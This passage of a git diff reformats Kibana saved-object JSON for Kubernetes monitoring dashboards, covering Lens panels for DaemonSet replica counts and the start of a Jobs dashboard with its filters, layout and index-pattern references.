- "w": 12, - "x": 24, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "e39b7173-1acf-4b60-9500-caa97eb5fabb", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + 
} + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "edebd4ce-012f-4677-ab82-cdb1e495c9b5", + "collapseFn": "sum", + "layerId": "bb896fbb-5e73-4bb9-922d-922562b1e71f", + "layerType": "data", + "metricAccessor": "33e722b3-a080-438a-a3d9-83f6da23009a" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", - "type": "index-pattern" + "title": "DaemonSet Replicas Unavailable [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "e39b7173-1acf-4b60-9500-caa97eb5fabb", + "w": 12, + "x": 24, + "y": 4 + }, + "panelIndex": "e39b7173-1acf-4b60-9500-caa97eb5fabb", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "29b0a3c9-8a78-4a42-bc09-60671675e57c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "54d4cb18-d411-4a9b-a241-8ecc1f2efddd": { + "columnOrder": [ + "515a5062-e737-46a4-a456-257440ce7eb3", + "71fe8682-2b23-416c-973f-ae5f63658dc3" + ], + "columns": { + 
"515a5062-e737-46a4-a456-257440ce7eb3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "29b0a3c9-8a78-4a42-bc09-60671675e57c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "54d4cb18-d411-4a9b-a241-8ecc1f2efddd": { - "columnOrder": [ - "515a5062-e737-46a4-a456-257440ce7eb3", - "71fe8682-2b23-416c-973f-ae5f63658dc3" - ], - "columns": { - "515a5062-e737-46a4-a456-257440ce7eb3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - }, - "71fe8682-2b23-416c-973f-ae5f63658dc3": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.ready\": *" - }, - "isBucketed": false, - "label": "Replicas Ready", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - 
"sourceField": "kubernetes.daemonset.replicas.ready" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "29b0a3c9-8a78-4a42-bc09-60671675e57c", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "515a5062-e737-46a4-a456-257440ce7eb3", - "collapseFn": "sum", - "layerId": "54d4cb18-d411-4a9b-a241-8ecc1f2efddd", - "layerType": "data", - "metricAccessor": "71fe8682-2b23-416c-973f-ae5f63658dc3" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" }, - "title": "DaemonSet Replicas Ready [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "71fe8682-2b23-416c-973f-ae5f63658dc3": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.ready\": *" + }, + "isBucketed": false, + "label": "Replicas Ready", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.ready" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "08341473-695b-44de-8faa-8ca14a6031e1", - "w": 12, - "x": 36, - "y": 4 + 
"indexpattern": { + "layers": {} }, - "panelIndex": "08341473-695b-44de-8faa-8ca14a6031e1", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "29b0a3c9-8a78-4a42-bc09-60671675e57c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "515a5062-e737-46a4-a456-257440ce7eb3", + "collapseFn": "sum", + "layerId": "54d4cb18-d411-4a9b-a241-8ecc1f2efddd", + "layerType": "data", + "metricAccessor": "71fe8682-2b23-416c-973f-ae5f63658dc3" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1ecf2434-25f0-454c-94cd-67a09297f08f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "14c12ba0-f1aa-48ac-98c4-111594e9244c": { - "columnOrder": [ - "3f5990a9-a37a-429c-879c-8f4361fdb541", - "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", - "34892916-522d-4b2e-b286-a534475b34a1", - "431b1111-09a2-4c06-8a86-c345ea80f6ed" - ], - "columns": { - "34892916-522d-4b2e-b286-a534475b34a1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "median", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.desired" - }, - "3f5990a9-a37a-429c-879c-8f4361fdb541": { - "customLabel": true, - "dataType": "string", - "isBucketed": 
true, - "label": "DaemonSet Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - }, - "431b1111-09a2-4c06-8a86-c345ea80f6ed": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.daemonset.replicas.unavailable: *" - }, - "isBucketed": false, - "label": "Replicas Unavailable", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.unavailable" - }, - "ad8b1756-1e89-403e-a4be-6bb918a3ae4c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.daemonset.replicas.available: *" - }, - "isBucketed": false, - "label": "Replicas Available", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.available" - } - }, - "incompleteColumns": {} - } - } - } + "title": "DaemonSet Replicas Ready [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "08341473-695b-44de-8faa-8ca14a6031e1", + "w": 12, + "x": 36, + "y": 4 + }, + "panelIndex": "08341473-695b-44de-8faa-8ca14a6031e1", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1ecf2434-25f0-454c-94cd-67a09297f08f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + 
"formBased": { + "layers": { + "14c12ba0-f1aa-48ac-98c4-111594e9244c": { + "columnOrder": [ + "3f5990a9-a37a-429c-879c-8f4361fdb541", + "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", + "34892916-522d-4b2e-b286-a534475b34a1", + "431b1111-09a2-4c06-8a86-c345ea80f6ed" + ], + "columns": { + "34892916-522d-4b2e-b286-a534475b34a1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "median", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.desired" + }, + "3f5990a9-a37a-429c-879c-8f4361fdb541": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "DaemonSet Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1ecf2434-25f0-454c-94cd-67a09297f08f", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "accessors": [ - "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", - "34892916-522d-4b2e-b286-a534475b34a1", - "431b1111-09a2-4c06-8a86-c345ea80f6ed" - ], - "layerId": "14c12ba0-f1aa-48ac-98c4-111594e9244c", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "3f5990a9-a37a-429c-879c-8f4361fdb541", - "yConfig": [ - { - "color": "#dd0a50", - "forAccessor": "431b1111-09a2-4c06-8a86-c345ea80f6ed" - } - ] - } - ], - "legend": { - "isVisible": true, - 
"position": "right" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide" - } + "size": 20 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" + }, + "431b1111-09a2-4c06-8a86-c345ea80f6ed": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.daemonset.replicas.unavailable: *" + }, + "isBucketed": false, + "label": "Replicas Unavailable", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.unavailable" }, - "title": "Replicas per DaemonSet [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "ad8b1756-1e89-403e-a4be-6bb918a3ae4c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.daemonset.replicas.available: *" + }, + "isBucketed": false, + "label": "Replicas Available", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.available" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1ecf2434-25f0-454c-94cd-67a09297f08f", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 16, - "i": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", - "w": 48, - "x": 0, - "y": 11 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", + "34892916-522d-4b2e-b286-a534475b34a1", + 
"431b1111-09a2-4c06-8a86-c345ea80f6ed" + ], + "layerId": "14c12ba0-f1aa-48ac-98c4-111594e9244c", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "3f5990a9-a37a-429c-879c-8f4361fdb541", + "yConfig": [ + { + "color": "#dd0a50", + "forAccessor": "431b1111-09a2-4c06-8a86-c345ea80f6ed" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" }, - "panelIndex": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", - "title": "Replicas per DaemonSet [Metrics Kubernetes]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] DaemonSets", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-31T12:42:19.191Z", - "id": "kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013", - "managed": false, - "references": [ - { - "id": "metrics-*", - "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:d115572d-c1ae-4402-bd61-7f6aca621b17", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2f904623-cc34-4a48-afce-46fff964dbdf:indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2f904623-cc34-4a48-afce-46fff964dbdf:9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:1aacb9a8-18b0-46cb-a522-1cfac61e09ef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "08341473-695b-44de-8faa-8ca14a6031e1:indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", - "type": "index-pattern" - }, - { - "id": 
"metrics-*", - "name": "08341473-695b-44de-8faa-8ca14a6031e1:29b0a3c9-8a78-4a42-bc09-60671675e57c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:1ecf2434-25f0-454c-94cd-67a09297f08f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_0e42fece-4a2f-4b80-a57d-89eeec3d0d29:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "Replicas per DaemonSet [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "metrics-*", - "name": "controlGroup_cfe75517-e74e-43eb-9566-258234ad92e7:optionsListDataView", - "type": "index-pattern" + "gridData": { + "h": 16, + "i": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", + "w": 48, + "x": 0, + "y": 11 }, - { - "id": "metrics-*", - "name": "controlGroup_274480d2-d432-486c-bce5-e88caa3d6b7a:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", + "title": "Replicas per DaemonSet [Metrics Kubernetes]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Kubernetes] DaemonSets", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:indexpattern-datasource-layer-e3bc5ca2-71af-4901-ae1c-82e383f83ae9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "74f075ae-ea3e-40aa-a84c-2538a2195f6a:d115572d-c1ae-4402-bd61-7f6aca621b17", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"2f904623-cc34-4a48-afce-46fff964dbdf:indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2f904623-cc34-4a48-afce-46fff964dbdf:9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e39b7173-1acf-4b60-9500-caa97eb5fabb:1aacb9a8-18b0-46cb-a522-1cfac61e09ef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08341473-695b-44de-8faa-8ca14a6031e1:indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08341473-695b-44de-8faa-8ca14a6031e1:29b0a3c9-8a78-4a42-bc09-60671675e57c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd:1ecf2434-25f0-454c-94cd-67a09297f08f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_0e42fece-4a2f-4b80-a57d-89eeec3d0d29:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_cfe75517-e74e-43eb-9566-258234ad92e7:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_274480d2-d432-486c-bce5-e88caa3d6b7a:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file 
diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json index 061abd60a35..f689e25d101 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,911 +1,919 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"f85be4a4-bc01-41a9-b566-442569777dd4\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"f85be4a4-bc01-41a9-b566-442569777dd4\",\"enhancements\":{}}},\"db907011-1eb3-4ed7-ab48-679727ee08f2\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"db907011-1eb3-4ed7-ab48-679727ee08f2\",\"enhancements\":{}}},\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.job.name\",\"title\":\"Job Name\",\"id\":\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\",\"enhancements\":{}}}}" - }, - "description": "Metrics about Jobs", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI1MCwyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"f85be4a4-bc01-41a9-b566-442569777dd4\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster 
Name\",\"id\":\"f85be4a4-bc01-41a9-b566-442569777dd4\",\"enhancements\":{}}},\"db907011-1eb3-4ed7-ab48-679727ee08f2\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"db907011-1eb3-4ed7-ab48-679727ee08f2\",\"enhancements\":{}}},\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.job.name\",\"title\":\"Job Name\",\"id\":\"0a0c6dd9-2a6f-4d7a-b4f7-1231987bc460\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Jobs", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "ce57bb14-ee8a-43ba-bb57-a6f815838500", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "panelIndex": "ce57bb14-ee8a-43ba-bb57-a6f815838500", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + 
"embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e4408339-1fa7-47b3-bac9-d2e7945d989f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9b261d2c-645a-4dca-9229-9d8c52e79b9f": { + "columnOrder": [ + "d65fee9a-8196-4bcf-b80f-af8eae9974ea", + "3bd09ac0-4718-47e1-abb4-54cbcf502e63" + ], + "columns": { + "3bd09ac0-4718-47e1-abb4-54cbcf502e63": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.job.pods.active\": *" + }, + "isBucketed": false, + "label": "Active", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.job.pods.active" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "ce57bb14-ee8a-43ba-bb57-a6f815838500", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "ce57bb14-ee8a-43ba-bb57-a6f815838500", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9b261d2c-645a-4dca-9229-9d8c52e79b9f", - "type": "index-pattern" + "d65fee9a-8196-4bcf-b80f-af8eae9974ea": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.job.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + 
